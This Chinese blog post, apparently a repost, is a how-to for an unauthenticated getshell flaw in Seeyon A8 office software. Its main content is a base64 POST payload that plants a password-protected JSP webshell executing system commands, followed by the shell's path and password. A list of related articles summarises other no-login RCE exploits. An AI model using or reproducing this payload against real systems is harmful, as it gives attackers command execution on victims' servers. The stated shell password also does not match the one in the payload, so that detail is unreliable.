致远A8协同管理软件无需登录getshell漏洞

测试环境:致远A8-V5协同管理软件 V6.1_SP2_2018-03-27_2653852748

第1步:访问/seeyon/htmlofficeservlet如果出现下图所示的内容,表示存在漏洞。

第2步:构造PoC把下面的PoC经base64解码即就是POST数据包内容:
REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U=



第3步:访问webshellwebshell地址为/seeyon/test123456.jsp,密码为:asasd3344。






感谢大佬提供的Python脚本,参考链接:


https://github.com/nian-hua/CVEScript/blob/master/%E8%87%B4%E8%BF%9COA/zhiyuan.py



原文地址:https://www.cnblogs.com/dgjnszf/p/11104594.html
				


				
时间: 2024-07-29 19:16:05 

		


		


	

	
	

		


		
致远A8协同管理软件无需登录getshell漏洞的相关文章


								

		

			

                致远A8任意文件写入漏洞_getshell_exp
			

		

		

									

				近期爆出致远 OA 系统的一些版本存在任意文件写入漏洞,远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件,写入成功后可执行任意系统命令进而控制目标服务器. 目前已知易受攻击的版本: 致远A8-V5协同管理软件 V6.1sp1 致远A8+协同管理软件 V7.0.V7.0sp1.V7.0sp2.V7.0sp3 致远A8+协同管理软件 V7.1 如果成功利用此漏洞的攻击者可以在目标系统上写入任意文件,			

		

	

				

		

			

                WordPress插件Social Warfare<=3.5.2 无需登录RCE漏洞
			

		

		

									

				该漏洞只存在于Social Warfare插进的3.5.0.3.5.1和3.5.2版本中,其他版本不存在. 2019年3月21日插件作者紧急发布了3.5.3版本以修复高危的RCE漏洞,在<=3.5.2版本中存在一处无需登录即可getshell的RCE漏洞. 漏洞分析 在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php文件中有一处eval()函数,该函数将file_get_contents()读取			

		

	

				

		

			

                Zimbra无需登录RCE漏洞利用
			

		

		

									

				2019年3月13号,一名国外的安全研究员在他的博客上公布了zimbra RCE漏洞相关信息,但其中并未提到一些漏洞利用细节. 经过一段时间努力,根据网上各位大牛的分析和我自己的理解,在此我将整个漏洞的利用过程进行复现. 第一步:利用XXE读取配置文件 这里利用了CVE-2019-9670漏洞来读取配置文件,你需要在自己的VPS服务器上放置一个dtd文件,并使该文件能够通过HTTP访问.为了演示,我在GitHub上创建了一个仓库,从GitHub上获取dtd文件. 上图中用红框圈起来的就是zimb			

		

	

				

		

			

                案例 | 华仁药业数字化转型 致远互联打造数字化“中台”一条直线,映射出软件产业发展的辛酸与瓶颈。
			

		

		

									

				案例 | 华仁药业数字化转型 致远互联打造数字化"中台"一条直线,映射出软件产业发展的辛酸与瓶颈.中国医改政策的逐步推进,给医药企业带来了巨大的挑战.医药企业开始主动思变,探索管理转型和技术转型,而这两个方向的转型,都需要企业进行数字化转型来提供支撑.为应对挑战,华仁药业股份有限公司(以下简称"华仁药业")制定了数字化发展战略,即面向终端医院,面向终端患者,建设生态圈,帮助医疗机构和患者之间建立一个开放互联.共享协同的平台.为实现这个目标,华仁药业构建了整体的数字化			

		

	

				

		

			

                软件驱动数字经济发展 协同管理助推数字化升级
			

		

		

									

				近年来,云计算.大数据.人工智能等新兴技术迭代迅速,传统产业面临数字化升级,由此也将企业级软件服务行业带到了新的风口.据统计,2019年1-11月,我国软件和信息技术服务业保持平稳发展态势,收入和利润继续保持两位数增长. 毫无疑问,软件是信息技术之魂.网络安全之盾.经济转型之擎.数字社会之源,是引领新一轮科技革命和产业变革的重要动力.当前,软件已经全面融入经济社会各领域,驱动着数字经济蓬勃发展和智慧社会的加速演进. 作为中国软件产业最具影响力的盛会,"2020中国软件产业年会"正是在数			

		

	

				

		

			

                致远力推协同运营中台,赋能数字化升级
			

		

		

									

				致远力推协同运营中台,赋能数字化升级常言道,说得容易,做起来难.相较于以往的提高产能.扩大经营.明确分工而言,数字化时代企业的升级则更多的体现在IT治理方面.然而,很多企业在IT治理方面却无从下手,为什么会出现这种焦虑?这是由于,企业在前端部署了大量移动化.轻量化.场景化.智能化的应用,这些应用灵动且与场景紧密相连,稳重的业务数据处理后台却无法适应前端应用的快速迭代,无法达到同频共振. 为了解决这一问题,致远互联全新推出了协同运营中台.何为协同运营中台?其又如何为企业数字化升级赋能?我们知道,数			

		

	

				

		

			

                致远互联助力中原证券实现预算到业务管理和服务的全面数字化
			

		

		

									

				最近,致远互联与中原证券股份有限公司(以下简称"中原证券")正式签约了,为了更好地基于数字化技术推动业务发展,中原证券将依靠致远互联协作经营中台连通信息内容堡垒,创建全自动.灵巧的机构步骤,进而解决变幻莫测的业务流程现况.市场竞争布局和客户满意度.中原证券是河南内申请注册的惟一一间法定代表人证劵公司,有着金融市场全业务流程支付牌照.中原证券可以朝向各种公司.组织和地区政府融资平台出示境外证劵保荐包销.并购重组.证券化.股票质押股权融资等技术专业高效率的金融市场综合服务:同时,还可以为个			

		

	

				

		

			

                免费版流程管理软件登录方式与应用要点提示
			

		

		

									

				系统登录方式 一.客户端登录 客户端登录需要安装易协流程管理软件客户端,客户端登录的优点是可以接收桌面即时消息.可发送消息并实现一键登录所有授权子系统.对于系统管理员必须安装客户端进行系统配置.表单设计.流程编辑等. 如果系统进行了分级管理,企业管理员与部门管理员都需要安装客户端按权限对系统进行管理. 二.浏览器登录 对于不关心业务即时消息的用户可采用浏览器登录系统,登录进系统后系统并发数加一,正常退出系统(点击退出按钮)并发数减一,如果非正常退出系统,稍有延迟后,系统并发数才会减一,浏览器支持			

		

	

				

		

			

                无需编码,轻松搭建企业采购管理软件
			

		

		

									

				采购管理软件是具有采购申请.采购订货.入库检查.货物管理.出库登记等一系列功能的管理软件 本文主要介绍如何在无需编码的情况下,使用活字格搭建企业采购管理软件. 第一步.完成采购系统的数据表设计 第二步.完成设计表之间关系的联接 第三步.使用统计字段设置需要统计的数据 第四步.设计采购管理系统的页面 第五步.规划完整体页面后,开始设计页面模板 第六步.设计每个页面的布局和功能 最后,进入系统,查看采购信息 使用活字格,无需编码,轻松搭建企业采购管理软件. 了解活字格:http://www.grap